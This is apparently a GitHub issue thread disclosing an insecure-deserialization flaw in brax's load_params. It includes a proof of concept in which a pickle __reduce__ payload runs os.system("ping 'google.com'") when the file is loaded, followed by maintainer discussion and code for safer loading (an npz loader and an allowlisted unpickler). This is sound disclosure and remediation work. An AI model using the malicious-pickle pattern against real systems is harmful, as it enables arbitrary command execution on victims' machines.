brax
Insecure Deserialization attack on pickle.loads
I noticed that the load_params function in brax.io.model passes the contents of a user-supplied file directly to pickle, which allows an attacker to execute arbitrary system commands on the victim's system through an insecure deserialization attack.
Vulnerable Function
https://github.com/google/brax/blob/69637a359463738140c1b850f61ad0088a23538b/brax/io/model.py#L22
Exploit Code (Attacker Side):
import pickle
import os

class MaliciousCode:
    # __reduce__ tells pickle which callable to invoke when the object is loaded.
    def __reduce__(self):
        return (os.system, ("ping 'google.com'",))

with open('malicious.pkl', 'wb') as f:
    pickle.dump(MaliciousCode(), f)
Exploit Code (Victim Side):
from brax.io import model
# Loading the file runs os.system("ping 'google.com'") on the victim's machine.
model.load_params("malicious.pkl")
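A harmless way to confirm this behavior without running a shell command is to have `__reduce__` name a callable that only computes a value. The sketch below uses the standard library only; `Payload` is a hypothetical name, and calling `pickle.loads` directly stands in for what load_params does with the file contents.

```python
import pickle


class Payload:
    """Any object whose __reduce__ names a callable gets that callable invoked on load."""

    def __reduce__(self):
        # Instead of os.system, name builtins.eval with a harmless expression.
        return (eval, ("6 * 7",))


# The attacker only ships these bytes; the Payload class itself is not referenced in them.
data = pickle.dumps(Payload())

# Merely deserializing runs eval("6 * 7"); the victim never calls anything explicitly.
result = pickle.loads(data)
print(result)  # 42
```

Because the pickle stream only references `builtins.eval`, the victim does not need the attacker's class to be importable for the payload to run.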
Acknowledged, this has been on our TODO list for some time. As a start, I implemented orbax checkpointing in PPO: https://github.com/google/brax/blob/d48b0b373a6478838eac325cadc6d8983837a968/brax/training/agents/ppo/train.py#L534. A bigger refactor is needed to bubble this logic up into load_params, though, because the target state has to be provided ahead of time (AOT) when loading the params.
The flax serializer has a similar requirement: the target needs to be defined AOT. The right thing to do is perhaps to nix model.load_params and save_params altogether and rely entirely on a flax/nnx/orbax serializer (along with a model config to generate the target pytree).
Happy to review any PRs if someone wants to take a look.
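The "target defined ahead of time" idea can be illustrated without pickle. The sketch below is not flax, nnx, or orbax: it swaps in NumPy's `.npz` format loaded with `allow_pickle=False`, and the helpers `save_params_npz` / `load_params_npz` are hypothetical. It assumes params are a nested dict of numeric arrays whose keys contain no "/". The caller supplies a target with the expected structure (in practice generated from a model config), and loading fails unless every leaf matches in name, shape, and dtype.

```python
import io

import numpy as np


def _flatten(tree, prefix=""):
    """Flatten a nested dict of arrays into {"a/b": array}; assumes keys contain no "/"."""
    flat = {}
    for key, value in tree.items():
        path = f"{prefix}/{key}" if prefix else key
        if isinstance(value, dict):
            flat.update(_flatten(value, path))
        else:
            flat[path] = np.asarray(value)
    return flat


def _restore(target, flat, prefix=""):
    """Rebuild the nested structure of `target`, taking leaves from `flat`."""
    out = {}
    for key, value in target.items():
        path = f"{prefix}/{key}" if prefix else key
        out[key] = _restore(value, flat, path) if isinstance(value, dict) else flat[path]
    return out


def save_params_npz(params) -> bytes:
    """Serialize a nested dict of numeric arrays to .npz bytes."""
    buf = io.BytesIO()
    np.savez(buf, **_flatten(params))
    return buf.getvalue()


def load_params_npz(data: bytes, target):
    """Load params into the structure of `target`, rejecting anything unexpected."""
    expected = _flatten(target)
    checked = {}
    # allow_pickle=False makes NumPy raise ValueError instead of unpickling object arrays.
    with np.load(io.BytesIO(data), allow_pickle=False) as npz:
        if set(npz.files) != set(expected):
            raise ValueError(f"key mismatch: {sorted(set(npz.files) ^ set(expected))}")
        for path, ref in expected.items():
            arr = npz[path]
            if arr.shape != ref.shape or arr.dtype != ref.dtype:
                raise ValueError(f"{path}: got {arr.shape} {arr.dtype}, expected {ref.shape} {ref.dtype}")
            checked[path] = arr
    return _restore(target, checked)


# The target would normally be generated from a model config; here it is hand-written.
target = {"policy": {"w": np.zeros((2, 3), np.float32), "b": np.zeros(3, np.float32)}}
params = {"policy": {"w": np.ones((2, 3), np.float32), "b": np.arange(3, dtype=np.float32)}}
restored = load_params_npz(save_params_npz(params), target)
print(restored["policy"]["b"])  # [0. 1. 2.]
```

The design choice mirrors the one described in the thread: because the loader only fills in leaves of a structure the caller already trusts, the file can never introduce new types or callables, only numbers.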
Commit 8526f9a64ee02010615a57a026a7b6aad05cbda0 starts to address this, but we likely won't fully deprecate brax.io.model for some time.
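Since brax.io.model will stay around for a while, one interim hardening (not something proposed in this thread) is the "restricting globals" pattern from the Python pickle documentation: subclass `pickle.Unpickler` and override `find_class` so only an explicit allowlist can be resolved. The allowlist and the names `RestrictedUnpickler` / `restricted_loads` below are hypothetical; a real params file containing NumPy arrays would need additional entries, and each entry widens the attack surface, so this narrows the risk rather than making pickle a safe format.

```python
import io
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be resolved while loading.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Replacement for pickle.loads that applies the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain containers of numbers reference no globals, so they still load.
ok = restricted_loads(pickle.dumps({"w": [1.0, 2.0], "b": 0.5}))


class Payload:
    def __reduce__(self):
        return (eval, ("6 * 7",))


try:
    restricted_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as err:
    print(err)  # global 'builtins.eval' is forbidden
```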